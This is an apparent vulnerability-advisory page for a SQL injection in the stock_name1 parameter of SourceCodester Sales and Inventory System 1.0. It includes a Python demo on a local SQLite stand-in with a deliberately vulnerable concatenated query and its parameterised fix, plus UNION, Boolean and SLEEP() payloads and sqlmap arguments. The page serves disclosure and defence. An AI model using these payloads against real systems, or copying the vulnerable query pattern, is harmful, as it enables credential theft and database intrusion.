SourceCodester Sales and Inventory System SQL Injection Vulnerability in Check Supplier Details Component

Vulnerability

A SQL injection vulnerability has been identified in SourceCodester Sales and Inventory System version 1.0. The issue resides in the check_supplier_details.php file, specifically in the handling of the POST parameter stock_name1, whose value reaches a database query without proper sanitisation or parameter binding. An authenticated attacker who controls this parameter can inject arbitrary SQL into the query the script builds, potentially leading to unauthorized data access or modification. The injection can be performed remotely over HTTP, and a public exploit is available.

Impact

Exploitation of this vulnerability allows for UNION-based, Boolean-based (blind), and time-based (blind) SQL injection, enabling an attacker to exfiltrate database contents such as supplier details and stored user credentials, and to manipulate the queries the application issues. Because the attacker already holds an application account, the main risk is escalation from a low-privileged user to full read access over the database.

Reproduction

To reproduce this vulnerability, log into the application with any valid account and send a POST request to check_supplier_details.php with a crafted stock_name1 parameter; a Boolean pair (one payload that keeps the original condition true, one that makes it false) or a MySQL SLEEP() payload with a measurable delay confirms the injection without relying on error messages. Alternatively, use sqlmap to automate the exploitation, passing the session cookie so that the requests are authenticated.
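The following added example is not the project's code and is not taken from the public exploit. It models the supplier lookup on an in-memory SQLite database with constructed rows (the table and column names supplier, stock_name, supplier_name, users, username and password are assumptions) and shows the hypothetical vulnerable pattern, string concatenation of stock_name1 into the SQL text, beside the parameterised form that closes the hole. The UNION-based and Boolean-based payloads run as-is; the time-based payload is shown only as a string because SLEEP() is MySQL-specific and has no SQLite equivalent.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the application's MySQL schema.
    Table and column names are assumptions for illustration only."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE supplier (stock_name TEXT, supplier_name TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO supplier VALUES ('Widget', 'Acme Supplies');
        INSERT INTO supplier VALUES ('Gadget', 'Globex Corp');
        INSERT INTO users VALUES ('admin', 'hash-of-admin-password');
    """)
    return conn


def lookup_vulnerable(conn, stock_name1):
    """Hypothetical vulnerable pattern: the POST value is spliced into the
    SQL text, so quote characters in it change the structure of the query."""
    sql = "SELECT supplier_name FROM supplier WHERE stock_name = '%s'" % stock_name1
    return [row[0] for row in conn.execute(sql)]


def lookup_fixed(conn, stock_name1):
    """Hardened form: the value is bound as a parameter and can never be
    interpreted as SQL, whatever characters it contains."""
    sql = "SELECT supplier_name FROM supplier WHERE stock_name = ?"
    return [row[0] for row in conn.execute(sql, (stock_name1,))]


# Attacker-controlled values for stock_name1. The trailing "-- " turns the
# closing quote that the vulnerable query appends into a comment.
UNION_PAYLOAD = "Widget' UNION ALL SELECT username || ':' || password FROM users-- "
TRUE_PAYLOAD = "Widget' AND 1=1-- "
FALSE_PAYLOAD = "Widget' AND 1=2-- "
# MySQL-only time-based probe; not executed here because SQLite has no SLEEP().
MYSQL_TIME_PAYLOAD = "Widget' AND SLEEP(5)-- "


def demo():
    """Run each payload against both lookups and return the rows observed."""
    conn = make_db()
    return {
        "normal": lookup_vulnerable(conn, "Widget"),
        "union": lookup_vulnerable(conn, UNION_PAYLOAD),      # leaks users table
        "bool_true": lookup_vulnerable(conn, TRUE_PAYLOAD),   # same as normal
        "bool_false": lookup_vulnerable(conn, FALSE_PAYLOAD), # empty: injected
        "fixed_union": lookup_fixed(conn, UNION_PAYLOAD),     # payload is inert
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:12s} -> {rows}")
```

The Boolean pair is the cheapest confirmation against the live application: if the true-condition payload returns the supplier's details and the false-condition payload returns nothing, the parameter is injectable. For sqlmap, the equivalent is to point it at the script with `--data "stock_name1=Widget" -p stock_name1` and supply the logged-in session via `--cookie`; the host path and cookie name (PHPSESSID for a default PHP deployment) depend on the installation and are not given on this page.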

Added: Mar 9, 2026, 12:19 AM
Updated: Mar 9, 2026, 12:19 AM

Vulnerability Rating

Custom Algorithm

spread          0.0
impact          2.5
exploitability  4.6
remediation     0.0
relevance       3.7
threat          6.4
urgency         2.9
incentive       0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.